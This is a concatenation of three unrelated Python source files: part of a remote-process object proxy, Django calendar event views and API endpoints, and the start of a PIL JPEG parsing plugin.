return self._getSpecialAttr('__ne__')(*args)
def __lt__(self, *args):
return self._getSpecialAttr('__lt__')(*args)
def __gt__(self, *args):
return self._getSpecialAttr('__gt__')(*args)
def __le__(self, *args):
return self._getSpecialAttr('__le__')(*args)
def __ge__(self, *args):
return self._getSpecialAttr('__ge__')(*args)
def __and__(self, *args):
return self._getSpecialAttr('__and__')(*args)
def __or__(self, *args):
return self._getSpecialAttr('__or__')(*args)
def __xor__(self, *args):
return self._getSpecialAttr('__xor__')(*args)
def __iand__(self, *args):
return self._getSpecialAttr('__iand__')(*args, _callSync='off')
def __ior__(self, *args):
return self._getSpecialAttr('__ior__')(*args, _callSync='off')
def __ixor__(self, *args):
return self._getSpecialAttr('__ixor__')(*args, _callSync='off')
def __mod__(self, *args):
return self._getSpecialAttr('__mod__')(*args)
def __radd__(self, *args):
return self._getSpecialAttr('__radd__')(*args)
def __rsub__(self, *args):
return self._getSpecialAttr('__rsub__')(*args)
def __rdiv__(self, *args):
return self._getSpecialAttr('__rdiv__')(*args)
def __rfloordiv__(self, *args):
return self._getSpecialAttr('__rfloordiv__')(*args)
def __rtruediv__(self, *args):
return self._getSpecialAttr('__rtruediv__')(*args)
def __rmul__(self, *args):
return self._getSpecialAttr('__rmul__')(*args)
def __rpow__(self, *args):
return self._getSpecialAttr('__rpow__')(*args)
def __rrshift__(self, *args):
return self._getSpecialAttr('__rrshift__')(*args)
def __rlshift__(self, *args):
return self._getSpecialAttr('__rlshift__')(*args)
def __rand__(self, *args):
return self._getSpecialAttr('__rand__')(*args)
def __ror__(self, *args):
return self._getSpecialAttr('__ror__')(*args)
    def __rxor__(self, *args):
        return self._getSpecialAttr('__rxor__')(*args)
def __rmod__(self, *args):
return self._getSpecialAttr('__rmod__')(*args)
def __hash__(self):
## Required for python3 since __eq__ is defined.
return id(self)
class DeferredObjectProxy(ObjectProxy):
"""
This class represents an attribute (or sub-attribute) of a proxied object.
It is used to speed up attribute requests. Take the following scenario::
rsys = proc._import('sys')
rsys.stdout.write('hello')
For this simple example, a total of 4 synchronous requests are made to
the remote process:
1) import sys
2) getattr(sys, 'stdout')
3) getattr(stdout, 'write')
4) write('hello')
    This takes a lot longer than running the equivalent code locally. To
    speed things up, we can 'defer' the two attribute lookups so they are
    only carried out when necessary::
        rsys = proc._import('sys')
        rsys._setProxyOptions(deferGetattr=True)
        rsys.stdout.write('hello')
    This example makes only two requests to the remote process; the two
    attribute lookups return DeferredObjectProxy instances immediately,
    without contacting the remote process. When the call to write() is
    made, all attribute requests are processed at the same time.
Note that if the attributes requested do not exist on the remote object,
making the call to write() will raise an AttributeError.
"""
def __init__(self, parentProxy, attribute):
## can't set attributes directly because setattr is overridden.
for k in ['_processId', '_typeStr', '_proxyId', '_handler']:
self.__dict__[k] = getattr(parentProxy, k)
self.__dict__['_parent'] = parentProxy ## make sure parent stays alive
self.__dict__['_attributes'] = parentProxy._attributes + (attribute,)
self.__dict__['_proxyOptions'] = parentProxy._proxyOptions.copy()
def __repr__(self):
return ObjectProxy.__repr__(self) + '.' + '.'.join(self._attributes)
def _undefer(self):
"""
Return a non-deferred ObjectProxy referencing the same object
"""
return self._parent.__getattr__(self._attributes[-1], _deferGetattr=False)
|
|
import datetime
import dateutil.parser
import pytz
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db.models import F, Q
from django.http import (
Http404, HttpResponseBadRequest, HttpResponseRedirect, JsonResponse,
)
from django.shortcuts import get_object_or_404
from django.utils import timezone
from django.utils.http import is_safe_url
from django.utils.six.moves.urllib.parse import quote
from django.views.decorators.http import require_POST
from django.views.generic.base import TemplateResponseMixin
from django.views.generic.detail import DetailView
from django.views.generic.edit import (
CreateView, DeleteView, ModelFormMixin, ProcessFormView, UpdateView,
)
from schedule.forms import EventForm, OccurrenceForm
from schedule.models import Calendar, Event, Occurrence
from schedule.periods import weekday_names
from schedule.settings import (
CHECK_EVENT_PERM_FUNC, CHECK_OCCURRENCE_PERM_FUNC, EVENT_NAME_PLACEHOLDER,
GET_EVENTS_FUNC, OCCURRENCE_CANCEL_REDIRECT, USE_FULLCALENDAR,
)
from schedule.utils import (
check_calendar_permissions, check_event_permissions,
check_occurrence_permissions, coerce_date_dict,
)
class CalendarViewPermissionMixin(object):
@classmethod
def as_view(cls, **initkwargs):
view = super(CalendarViewPermissionMixin, cls).as_view(**initkwargs)
return check_calendar_permissions(view)
class EventEditPermissionMixin(object):
@classmethod
def as_view(cls, **initkwargs):
view = super(EventEditPermissionMixin, cls).as_view(**initkwargs)
return check_event_permissions(view)
class OccurrenceEditPermissionMixin(object):
@classmethod
def as_view(cls, **initkwargs):
view = super(OccurrenceEditPermissionMixin, cls).as_view(**initkwargs)
return check_occurrence_permissions(view)
class CancelButtonMixin(object):
def post(self, request, *args, **kwargs):
next_url = kwargs.get('next')
self.success_url = get_next_url(request, next_url)
if "cancel" in request.POST:
return HttpResponseRedirect(self.success_url)
else:
return super(CancelButtonMixin, self).post(request, *args, **kwargs)
class CalendarMixin(CalendarViewPermissionMixin):
model = Calendar
slug_url_kwarg = 'calendar_slug'
class CalendarView(CalendarMixin, DetailView):
template_name = 'schedule/calendar.html'
class FullCalendarView(CalendarMixin, DetailView):
template_name = "fullcalendar.html"
def get_context_data(self, **kwargs):
context = super(FullCalendarView, self).get_context_data()
context['calendar_slug'] = self.kwargs.get('calendar_slug')
return context
class CalendarByPeriodsView(CalendarMixin, DetailView):
template_name = 'schedule/calendar_by_period.html'
def get_context_data(self, **kwargs):
context = super(CalendarByPeriodsView, self).get_context_data(**kwargs)
calendar = self.object
period_class = self.kwargs['period']
try:
date = coerce_date_dict(self.request.GET)
except ValueError:
raise Http404
if date:
try:
date = datetime.datetime(**date)
except ValueError:
raise Http404
else:
date = timezone.now()
event_list = GET_EVENTS_FUNC(self.request, calendar)
local_timezone = timezone.get_current_timezone()
period = period_class(event_list, date, tzinfo=local_timezone)
context.update({
'date': date,
'period': period,
'calendar': calendar,
'weekday_names': weekday_names,
'here': quote(self.request.get_full_path()),
})
return context
class OccurrenceMixin(CalendarViewPermissionMixin, TemplateResponseMixin):
model = Occurrence
pk_url_kwarg = 'occurrence_id'
form_class = OccurrenceForm
class OccurrenceEditMixin(CancelButtonMixin, OccurrenceEditPermissionMixin, OccurrenceMixin):
def get_initial(self):
initial_data = super(OccurrenceEditMixin, self).get_initial()
_, self.object = get_occurrence(**self.kwargs)
return initial_data
class OccurrenceView(OccurrenceMixin, DetailView):
template_name = 'schedule/occurrence.html'
class OccurrencePreview(OccurrenceMixin, ModelFormMixin, ProcessFormView):
template_name = 'schedule/occurrence.html'
def get_context_data(self, **kwargs):
context = super(OccurrencePreview, self).get_context_data()
context = {
'event': self.object.event,
'occurrence': self.object,
}
return context
class EditOccurrenceView(OccurrenceEditMixin, UpdateView):
template_name = 'schedule/edit_occurrence.html'
class CreateOccurrenceView(OccurrenceEditMixin, CreateView):
template_name = 'schedule/edit_occurrence.html'
class CancelOccurrenceView(OccurrenceEditMixin, ModelFormMixin, ProcessFormView):
template_name = 'schedule/cancel_occurrence.html'
def post(self, request, *args, **kwargs):
event, occurrence = get_occurrence(**kwargs)
self.success_url = kwargs.get(
'next',
get_next_url(request, event.get_absolute_url()))
if 'cancel' not in request.POST:
occurrence.cancel()
return HttpResponseRedirect(self.success_url)
class EventMixin(CalendarViewPermissionMixin):
model = Event
pk_url_kwarg = 'event_id'
class EventEditMixin(CancelButtonMixin, EventEditPermissionMixin, EventMixin):
pass
class EventView(EventMixin, DetailView):
template_name = 'schedule/event.html'
class EditEventView(EventEditMixin, UpdateView):
form_class = EventForm
template_name = 'schedule/create_event.html'
def form_valid(self, form):
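        # Shift every persisted occurrence by the same amount (in minutes)
        # that the event's start and end moved, so existing occurrences stay
        # aligned with the edited event.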
event = form.save(commit=False)
old_event = Event.objects.get(pk=event.pk)
dts = datetime.timedelta(
minutes=int((event.start - old_event.start).total_seconds() / 60)
)
dte = datetime.timedelta(
minutes=int((event.end - old_event.end).total_seconds() / 60)
)
event.occurrence_set.all().update(
original_start=F('original_start') + dts,
original_end=F('original_end') + dte,
)
event.save()
return super(EditEventView, self).form_valid(form)
class CreateEventView(EventEditMixin, CreateView):
form_class = EventForm
template_name = 'schedule/create_event.html'
def get_initial(self):
date = coerce_date_dict(self.request.GET)
initial_data = None
if date:
try:
start = datetime.datetime(**date)
initial_data = {
'start': start,
'end': start + datetime.timedelta(minutes=30)
}
except TypeError:
raise Http404
except ValueError:
raise Http404
return initial_data
def form_valid(self, form):
event = form.save(commit=False)
event.creator = self.request.user
event.calendar = get_object_or_404(Calendar, slug=self.kwargs['calendar_slug'])
event.save()
return HttpResponseRedirect(event.get_absolute_url())
class DeleteEventView(EventEditMixin, DeleteView):
template_name = 'schedule/delete_event.html'
def get_context_data(self, **kwargs):
ctx = super(DeleteEventView, self).get_context_data(**kwargs)
ctx['next'] = self.get_success_url()
return ctx
def get_success_url(self):
"""
        After the event is deleted there are three options for the redirect,
        tried in this order:
        # The 'next' GET variable, if present and safe.
        # The 'next' keyword argument, if given.
        # Lastly, the calendar view for the deleted event's calendar.
"""
url_val = 'fullcalendar' if USE_FULLCALENDAR else 'day_calendar'
next_url = self.kwargs.get('next') or reverse(url_val, args=[self.object.calendar.slug])
next_url = get_next_url(self.request, next_url)
return next_url
def get_occurrence(event_id, occurrence_id=None, year=None, month=None,
day=None, hour=None, minute=None, second=None,
tzinfo=None):
"""
    Because occurrences don't have to be persisted, there must be two ways to
    retrieve them. Both need an event; if the occurrence is persisted it can
    be retrieved by id, and if it is not persisted it takes a date to
    retrieve it. This function returns an event and occurrence regardless of
    which method is used.
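    Example (hypothetical ids and dates)::
        event, occurrence = get_occurrence(event_id=1, occurrence_id=7)
        event, occurrence = get_occurrence(event_id=1, year=2017, month=5,
                                           day=2, hour=9, minute=0, second=0)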
"""
    if occurrence_id:
occurrence = get_object_or_404(Occurrence, id=occurrence_id)
event = occurrence.event
elif None not in (year, month, day, hour, minute, second):
event = get_object_or_404(Event, id=event_id)
date = timezone.make_aware(datetime.datetime(int(year), int(month),
int(day), int(hour), int(minute),
int(second)), tzinfo)
occurrence = event.get_occurrence(date)
if occurrence is None:
raise Http404
else:
raise Http404
return event, occurrence
def check_next_url(next_url):
"""
    Checks that the next url does not redirect off-site: any URL containing
    a scheme separator ('://') is rejected. A minimal security check.
"""
if not next_url or '://' in next_url:
return None
return next_url
def get_next_url(request, default):
next_url = default
if OCCURRENCE_CANCEL_REDIRECT:
next_url = OCCURRENCE_CANCEL_REDIRECT
_next_url = request.GET.get('next') if request.method in ['GET', 'HEAD'] else request.POST.get('next')
if _next_url and is_safe_url(url=_next_url, host=request.get_host()):
next_url = _next_url
return next_url
@check_calendar_permissions
def api_occurrences(request):
start = request.GET.get('start')
end = request.GET.get('end')
calendar_slug = request.GET.get('calendar_slug')
timezone = request.GET.get('timezone')
try:
response_data = _api_occurrences(start, end, calendar_slug, timezone)
except (ValueError, Calendar.DoesNotExist) as e:
return HttpResponseBadRequest(e)
return JsonResponse(response_data, safe=False)
def _api_occurrences(start, end, calendar_slug, timezone):
if not start or not end:
raise ValueError('Start and end parameters are required')
# version 2 of full calendar
# TODO: improve this code with date util package
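    # fullcalendar v2 passes ISO date strings (e.g. '2017-01-31'), while v1
    # passed UNIX timestamps (e.g. '1485820800'); the '-' check below
    # distinguishes the two formats.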
if '-' in start:
def convert(ddatetime):
if ddatetime:
ddatetime = ddatetime.split(' ')[0]
return datetime.datetime.strptime(ddatetime, '%Y-%m-%d')
else:
def convert(ddatetime):
return datetime.datetime.utcfromtimestamp(float(ddatetime))
start = convert(start)
end = convert(end)
current_tz = False
if timezone and timezone in pytz.common_timezones:
# make start and end dates aware in given timezone
current_tz = pytz.timezone(timezone)
start = current_tz.localize(start)
end = current_tz.localize(end)
elif settings.USE_TZ:
# If USE_TZ is True, make start and end dates aware in UTC timezone
utc = pytz.UTC
start = utc.localize(start)
end = utc.localize(end)
if calendar_slug:
# will raise DoesNotExist exception if no match
calendars = [Calendar.objects.get(slug=calendar_slug)]
# if no calendar slug is given, get all the calendars
else:
calendars = Calendar.objects.all()
response_data = []
    # Generate an id for each occurrence shown in fullcalendar (NOT the same
    # as the database id) that is always unique. Fullcalendar treats all
    # "events" sharing the same "event.id" as the same object, because it is
    # not built around the distinction between events (generators) and
    # occurrences (their instances). The "existed" boolean in the response
    # tells the client whether to modify the event (via "event_id") or the
    # occurrence with the specified "id".
    # For more info see https://github.com/llazzaro/django-scheduler/pull/169
i = 1
if Occurrence.objects.all().count() > 0:
i = Occurrence.objects.latest('id').id + 1
event_list = []
for calendar in calendars:
# create flat list of events from each calendar
event_list += calendar.events.filter(start__lte=end).filter(
Q(end_recurring_period__gte=start) |
Q(end_recurring_period__isnull=True))
for event in event_list:
occurrences = event.get_occurrences(start, end)
for occurrence in occurrences:
occurrence_id = i + occurrence.event.id
existed = False
if occurrence.id:
occurrence_id = occurrence.id
existed = True
recur_rule = occurrence.event.rule.name \
if occurrence.event.rule else None
if occurrence.event.end_recurring_period:
recur_period_end = occurrence.event.end_recurring_period
if current_tz:
# make recur_period_end aware in given timezone
recur_period_end = recur_period_end.astimezone(current_tz)
else:
recur_period_end = None
event_start = occurrence.start
event_end = occurrence.end
if current_tz:
# make event start and end dates aware in given timezone
event_start = event_start.astimezone(current_tz)
event_end = event_end.astimezone(current_tz)
response_data.append({
'id': occurrence_id,
'title': occurrence.title,
'start': event_start,
'end': event_end,
'existed': existed,
'event_id': occurrence.event.id,
'color': occurrence.event.color_event,
'description': occurrence.description,
'rule': recur_rule,
'end_recurring_period': recur_period_end,
'creator': str(occurrence.event.creator),
'calendar': occurrence.event.calendar.slug,
'cancelled': occurrence.cancelled,
})
return response_data
@require_POST
@check_calendar_permissions
def api_move_or_resize_by_code(request):
response_data = {}
user = request.user
id = request.POST.get('id')
existed = bool(request.POST.get('existed') == 'true')
delta = datetime.timedelta(minutes=int(request.POST.get('delta')))
resize = bool(request.POST.get('resize', False))
event_id = request.POST.get('event_id')
response_data = _api_move_or_resize_by_code(
user,
id,
existed,
delta,
resize,
event_id)
return JsonResponse(response_data)
def _api_move_or_resize_by_code(user, id, existed, delta, resize, event_id):
response_data = {}
response_data['status'] = "PERMISSION DENIED"
if existed:
occurrence = Occurrence.objects.get(id=id)
occurrence.end += delta
if not resize:
occurrence.start += delta
if CHECK_OCCURRENCE_PERM_FUNC(occurrence, user):
occurrence.save()
response_data['status'] = "OK"
else:
event = Event.objects.get(id=event_id)
dts = 0
dte = delta
if not resize:
event.start += delta
dts = delta
event.end = event.end + delta
if CHECK_EVENT_PERM_FUNC(event, user):
event.save()
event.occurrence_set.all().update(
original_start=F('original_start') + dts,
original_end=F('original_end') + dte,
)
response_data['status'] = "OK"
return response_data
@require_POST
@check_calendar_permissions
def api_select_create(request):
response_data = {}
start = request.POST.get('start')
end = request.POST.get('end')
calendar_slug = request.POST.get('calendar_slug')
response_data = _api_select_create(start, end, calendar_slug)
return JsonResponse(response_data)
def _api_select_create(start, end, calendar_slug):
start = dateutil.parser.parse(start)
end = dateutil.parser.parse(end)
calendar = Calendar.objects.get(slug=calendar_slug)
Event.objects.create(
start=start,
end=end,
title=EVENT_NAME_PLACEHOLDER,
calendar=calendar,
)
response_data = {}
response_data['status'] = "OK"
return response_data
|
|
#
# The Python Imaging Library.
# $Id$
#
# JPEG (JFIF) file handling
#
# See "Digital Compression and Coding of Continuous-Tone Still Images,
# Part 1, Requirements and Guidelines" (CCITT T.81 / ISO 10918-1)
#
# History:
# 1995-09-09 fl Created
# 1995-09-13 fl Added full parser
# 1996-03-25 fl Added hack to use the IJG command line utilities
# 1996-05-05 fl Workaround Photoshop 2.5 CMYK polarity bug
# 1996-05-28 fl Added draft support, JFIF version (0.1)
# 1996-12-30 fl Added encoder options, added progression property (0.2)
# 1997-08-27 fl Save mode 1 images as BW (0.3)
# 1998-07-12 fl Added YCbCr to draft and save methods (0.4)
# 1998-10-19 fl Don't hang on files using 16-bit DQT's (0.4.1)
# 2001-04-16 fl Extract DPI settings from JFIF files (0.4.2)
# 2002-07-01 fl Skip pad bytes before markers; identify Exif files (0.4.3)
# 2003-04-25 fl Added experimental EXIF decoder (0.5)
# 2003-06-06 fl Added experimental EXIF GPSinfo decoder
# 2003-09-13 fl Extract COM markers
# 2009-09-06 fl Added icc_profile support (from Florian Hoech)
# 2009-03-06 fl Changed CMYK handling; always use Adobe polarity (0.6)
# 2009-03-08 fl Added subsampling support (from Justin Huff).
#
# Copyright (c) 1997-2003 by Secret Labs AB.
# Copyright (c) 1995-1996 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
__version__ = "0.6"
import array
import struct
import io
from struct import unpack
from PIL import Image, ImageFile, TiffImagePlugin, _binary
from PIL.JpegPresets import presets
from PIL._util import isStringType
i8 = _binary.i8
o8 = _binary.o8
i16 = _binary.i16be
i32 = _binary.i32be
#
# Parser
def Skip(self, marker):
n = i16(self.fp.read(2))-2
ImageFile._safe_read(self.fp, n)
def APP(self, marker):
#
# Application marker. Store these in the APP dictionary.
# Also look for well-known application markers.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
app = "APP%d" % (marker & 15)
self.app[app] = s # compatibility
self.applist.append((app, s))
if marker == 0xFFE0 and s[:4] == b"JFIF":
# extract JFIF information
self.info["jfif"] = version = i16(s, 5) # version
self.info["jfif_version"] = divmod(version, 256)
# extract JFIF properties
try:
jfif_unit = i8(s[7])
jfif_density = i16(s, 8), i16(s, 10)
        except Exception:
pass
else:
if jfif_unit == 1:
self.info["dpi"] = jfif_density
self.info["jfif_unit"] = jfif_unit
self.info["jfif_density"] = jfif_density
elif marker == 0xFFE1 and s[:5] == b"Exif\0":
# extract Exif information (incomplete)
self.info["exif"] = s # FIXME: value will change
elif marker == 0xFFE2 and s[:5] == b"FPXR\0":
# extract FlashPix information (incomplete)
self.info["flashpix"] = s # FIXME: value will change
elif marker == 0xFFE2 and s[:12] == b"ICC_PROFILE\0":
# Since an ICC profile can be larger than the maximum size of
# a JPEG marker (64K), we need provisions to split it into
# multiple markers. The format defined by the ICC specifies
# one or more APP2 markers containing the following data:
# Identifying string ASCII "ICC_PROFILE\0" (12 bytes)
# Marker sequence number 1, 2, etc (1 byte)
# Number of markers Total of APP2's used (1 byte)
        # Profile data (remainder of APP2 data)
# Decoders should use the marker sequence numbers to
# reassemble the profile, rather than assuming that the APP2
# markers appear in the correct sequence.
self.icclist.append(s)
elif marker == 0xFFEE and s[:5] == b"Adobe":
self.info["adobe"] = i16(s, 5)
# extract Adobe custom properties
try:
adobe_transform = i8(s[1])
        except Exception:
pass
else:
self.info["adobe_transform"] = adobe_transform
elif marker == 0xFFE2 and s[:4] == b"MPF\0":
# extract MPO information
self.info["mp"] = s[4:]
# offset is current location minus buffer size
# plus constant header size
self.info["mpoffset"] = self.fp.tell() - n + 4
def COM(self, marker):
#
# Comment marker. Store these in the APP dictionary.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
self.app["COM"] = s # compatibility
self.applist.append(("COM", s))
def SOF(self, marker):
#
# Start of frame marker. Defines the size and mode of the
# image. JPEG is colour blind, so we use some simple
# heuristics to map the number of layers to an appropriate
# mode. Note that this could be made a bit brighter, by
# looking for JFIF and Adobe APP markers.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
self.size = i16(s[3:]), i16(s[1:])
self.bits = i8(s[0])
if self.bits != 8:
raise SyntaxError("cannot handle %d-bit layers" % self.bits)
self.layers = i8(s[5])
if self.layers == 1:
self.mode = "L"
elif self.layers == 3:
self.mode = "RGB"
elif self.layers == 4:
self.mode = "CMYK"
else:
raise SyntaxError("cannot handle %d-layer images" % self.layers)
if marker in [0xFFC2, 0xFFC6, 0xFFCA, 0xFFCE]:
self.info["progressive"] = self.info["progression"] = 1
if self.icclist:
# fixup icc profile
self.icclist.sort() # sort by sequence number
if i8(self.icclist[0][13]) == len(self.icclist):
profile = []
for p in self.icclist:
profile.append(p[14:])
icc_profile = b"".join(profile)
else:
icc_profile = None # wrong number of fragments
self.info["icc_profile"] = icc_profile
self.icclist = None
for i in range(6, len(s), 3):
t = s[i:i+3]
# 4-tuples: id, vsamp, hsamp, qtable
self.layer.append((t[0], i8(t[1])//16, i8(t[1]) & 15, i8(t[2])))
def DQT(self, marker):
#
# Define quantization table. Support baseline 8-bit tables
# only. Note that there might be more than one table in
# each marker.
# FIXME: The quantization tables can be used to estimate the
# compression quality.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
while len(s):
if len(s) < 65:
raise SyntaxError("bad quantization table marker")
v = i8(s[0])
if v//16 == 0:
            self.quantization[v & 15] = array.array("B", s[1:65])
s = s[65:]
else:
return # FIXME: add code to read 16-bit tables!
# raise SyntaxError, "bad quantization table element size"
#
# JPEG marker table
MARKER = {
0xFFC0: ("SOF0", "Baseline DCT", SOF),
0xFFC1: ("SOF1", "Extended Sequential DCT", SOF),
0xFFC2: ("SOF2", "Progressive DCT", SOF),
0xFFC3: ("SOF3", "Spatial lossless", SOF),
0xFFC4: ("DHT", "Define Huffman table", Skip),
0xFFC5: ("SOF5", "Differential sequential DCT", SOF),
0xFFC6: ("SOF6", "Differential progressive DCT", SOF),
0xFFC7: ("SOF7", "Differential spatial", SOF),
0xFFC8: ("JPG", "Extension", None),
0xFFC9: ("SOF9", "Extended sequential DCT (AC)", SOF),
0xFFCA: ("SOF10", "Progressive DCT (AC)", SOF),
0xFFCB: ("SOF11", "Spatial lossless DCT (AC)", SOF),
0xFFCC: ("DAC", "Define arithmetic coding conditioning", Skip),
0xFFCD: ("SOF13", "Differential sequential DCT (AC)", SOF),
0xFFCE: ("SOF14", "Differential progressive DCT (AC)", SOF),
0xFFCF: ("SOF15", "Differential spatial (AC)", SOF),
0xFFD0: ("RST0", "Restart 0", None),
0xFFD1: ("RST1", "Restart 1", None),
0xFFD2: ("RST2", "Restart 2", None),
0xFFD3: ("RST3", "Restart 3", None),
0xFFD4: ("RST4", "Restart 4", None),
0xFFD5: ("RST5", "Restart 5", None),
0xFFD6: ("RST6", "Restart 6", None),
0xFFD7: ("RST7", "Restart 7", None),
0xFFD8: ("SOI", "Start of image", None),
0xFFD9: ("EOI", "End of image", None),
0xFFDA: ("SOS", "Start of scan", Skip),
0xFFDB: ("DQT", "Define quantization table", DQT),
0xFFDC: ("DNL", "Define number of lines", Skip),
0xFFDD: ("DRI", "Define restart interval", Skip),
0xFFDE: ("DHP", "Define hierarchical progression", SOF),
0xFFDF: ("EXP", "Expand reference component", Skip),
0xFFE0: ("APP0", "Application segment 0", APP),
0xFFE1: ("APP1", "Application segment 1", APP),
0xFFE2: ("APP2", "Application segment 2", APP),
0xFFE3: ("APP3", "Application segment 3", APP),
0xFFE4: ("APP4", "Application segment 4", APP),
0xFFE5: ("APP5", "Application segment 5", APP),
0xFFE6: ("APP6", "Application segment 6", APP),
0xFFE7: ("APP7", "Application segment 7", APP),
0xFFE8: ("APP8", "Application segment 8", APP),
0xFFE9: ("APP9", "Application segment 9", APP),
0xFFEA: ("APP10", "Application segment 10", APP),
0xFFEB: ("APP11", "Application segment 11", APP),
0xFFEC: ("APP12", "Application segment 12", APP),
0xFFED: ("APP13", "Application segment 13", APP),
0xFFEE: ("APP14", "Application segment 14", APP),
0xFFEF: ("APP15", "Application segment 15", APP),
0xFFF0: ("JPG0", "Extension 0", None),
0xFFF1: ("JPG1", "Extension 1", None),
0xFFF2: ("JPG2", "Extension 2", None),
0xFFF3: ("JPG3", "Extension 3", None),
0xFFF4: ("JPG4", "Extension 4", None),
0xFFF5: ("JPG5", "Extension 5", None),
0xFFF6: ("JPG6", "Extension 6", None),
0xFFF7: ("JPG7", "Extension 7", None),
0xFFF8: ("JPG8", "Extension 8", None),
0xFFF9: ("JPG9", "Extension 9", None),
0xFFFA: ("JPG10", "Extension 10", None),
0xFFFB: ("JPG11", "Extension 11", None),
0xFFFC: ("JPG12", "Extension 12", None),
0xFFFD: ("JPG13", "Extension 13", None),
0xFFFE: ("COM", "Comment", COM)
}
def _accept(prefix):
return prefix[0:1] == b"\377"
##
# Image plugin for JPEG and JFIF images.
class JpegImageFile(ImageFile.ImageFile):
format = "JPEG"
format_description = "JPEG (ISO 10918)"
def _open(self):
s = self.fp.read(1)
if i8(s[0]) != 255:
raise SyntaxError("not a JPEG file")
# Create attributes
self.bits = self.layers = 0
# JPEG specifics (internal)
self.layer = []
self.huffman_dc = {}
self.huffman_ac = {}
self.quantization = {}
self.app = {} # compatibility
self.applist = []
self.icclist = []
while True:
i = i8(s)
if i == 0xFF:
s = s + self.fp.read(1)
i = i16(s)
else:
# Skip non-0xFF junk
s = b"\xff"
continue
if i in MARKER:
name, description, handler = MARKER[i]
# print hex(i), name, description
if handler is not None:
handler(self, i)
if i == 0xFFDA: # start of scan
rawmode = self.mode
if self.mode == "CMYK":
rawmode = "CMYK;I" # assume adobe conventions
self.tile = [("jpeg", (0, 0) + self.size, 0,
(rawmode, ""))]
# self.__offset = self.fp.tell()
break
s = self.fp.read(1)
elif i == 0 or i == 0xFFFF:
# padded marker or junk; move on
s = b"\xff"
else:
raise SyntaxError("no marker found")
def draft(self, mode, size):
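        # Approximate the requested mode and size cheaply: the decoder can
        # skip colour conversion and downscale by 1/2, 1/4, or 1/8 during
        # decoding, which is much faster than a full decode plus resize.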
if len(self.tile) != 1:
return
d, e, o, a = self.tile[0]
scale = 0
if a[0] == "RGB" and mode in ["L", "YCbCr"]:
self.mode = mode
a = mode, ""
if size:
scale = max(self.size[0] // size[0], self.size[1] // size[1])
for s in [8, 4, 2, 1]:
if scale >= s:
break
e = e[0], e[1], (e[2]-e[0]+s-1)//s+e[0], (e[3]-e[1]+s-1)//s+e[1]
self.size = ((self.size[0]+s-1)//s, (self.size[1]+s-1)//s)
scale = s
self.tile = [(d, e, o, a)]
self.decoderconfig = (scale, 0)
return self
def load_djpeg(self):
# ALTERNATIVE: handle JPEGs via the IJG command line utilities
import subprocess
import tempfile
import os
f, path = tempfile.mkstemp()
os.close(f)
if os.path.exists(self.filename):
subprocess.check_call(["djpeg", "-outfile", path, self.filename])
else:
raise ValueError("Invalid Filename")
try:
self.im = Image.core.open_ppm(path)
finally:
try:
os.unlink(path)
            except Exception:
pass
self.mode = self.im.mode
self.size = self.im.size
self.tile = []
def _getexif(self):
return _getexif(self)
def _getmp(self):
return _getmp(self)
def _fixup(value):
# Helper function for _getexif() and _getmp()
if len(value) == 1:
return value[0]
return value
def _getexif(self):
# Extract EXIF information. This method is highly experimental,
# and is likely to be replaced with something better in a future
# version.
# The EXIF record consists of a TIFF file embedded in a JPEG
# application marker (!).
try:
data = self.info["exif"]
except KeyError:
return None
file = io.BytesIO(data[6:])
head = file.read(8)
exif = {}
# process dictionary
info = TiffImagePlugin.ImageFileDirectory(head)
info.load(file)
for key, value in info.items():
exif[key] = _fixup(value)
# get exif extension
try:
file.seek(exif[0x8769])
except KeyError:
pass
else:
info = TiffImagePlugin.ImageFileDirectory(head)
info.load(file)
for key, value in info.items():
exif[key] = _fixup(value)
# get gpsinfo extension
try:
file.seek(exif[0x8825])
except KeyError:
pass
else:
info = TiffImagePlugin.ImageFileDirectory(head)
info.load(file)
exif[0x8825] = gps = {}
for key, value in info.items():
gps[key] = _fixup(value)
return exif
def _getmp(self):
# Extract MP information. This method was inspired by the "highly
# experimental" _getexif version that's been in use for years now,
# itself based on the ImageFileDirectory class in the TIFF plug-in.
# The MP record essentially consists of a TIFF file embedded in a JPEG
# application marker.
try:
data = self.info["mp"]
except KeyError:
return None
file_contents = io.BytesIO(data)
head = file_contents.read(8)
endianness = '>' if head[:4] == b'\x4d\x4d\x00\x2a' else '<'
mp = {}
# process dictionary
info = TiffImagePlugin.ImageFileDirectory(head)
info.load(file_contents)
for key, value in info.items():
mp[key] = _fixup(value)
# it's an error not to have a number of images
try:
quant = mp[0xB001]
except KeyError:
raise SyntaxError("malformed MP Index (no number of images)")
# get MP entries
try:
mpentries = []
for entrynum in range(0, quant):
rawmpentry = mp[0xB002][entrynum * 16:(entrynum + 1) * 16]
unpackedentry = unpack('{0}LLLHH'.format(endianness), rawmpentry)
labels = ('Attribute', 'Size', 'DataOffset', 'EntryNo1',
'EntryNo2')
mpentry = dict(zip(labels, unpackedentry))
mpentryattr = {
'DependentParentImageFlag': bool(mpentry['Attribute'] &
(1 << 31)),
'DependentChildImageFlag': bool(mpentry['Attribute'] &
(1 << 30)),
'RepresentativeImageFlag': bool(mpentry['Attribute'] &
(1 << 29)),
'Reserved': (mpentry['Attribute'] & (3 << 27)) >> 27,
'ImageDataFormat': (mpentry['Attribute'] & (7 << 24)) >> 24,
'MPType': mpentry['Attribute'] & 0x00FFFFFF
}
if mpentryattr['ImageDataFormat'] == 0:
mpentryattr['ImageDataFormat'] = 'JPEG'
else:
raise SyntaxError("unsupported picture format in MPO")
mptypemap = {
0x000000: 'Undefined',
0x010001: 'Large Thumbnail (VGA Equivalent)',
0x010002: 'Large Thumbnail (Full HD Equivalent)',
0x020001: 'Multi-Frame Image (Panorama)',
0x020002: 'Multi-Frame Image: (Disparity)',
0x020003: 'Multi-Frame Image: (Multi-Angle)',
0x030000: 'Baseline MP Primary Image'
}
mpentryattr['MPType'] = mptypemap.get(mpentryattr['MPType'],
'Unknown')
mpentry['Attribute'] = mpentryattr
mpentries.append(mpentry)
mp[0xB002] = mpentries
except KeyError:
raise SyntaxError("malformed MP Index (bad MP Entry)")
# Next we should try and parse the individual image unique ID list;
# we don't because I've never seen this actually used in a real MPO
# file and so can't test it.
return mp
# --------------------------------------------------------------------
# stuff to save JPEG files
RAWMODE = {
"1": "L",
"L": "L",
"RGB": "RGB",
"RGBA": "RGB",
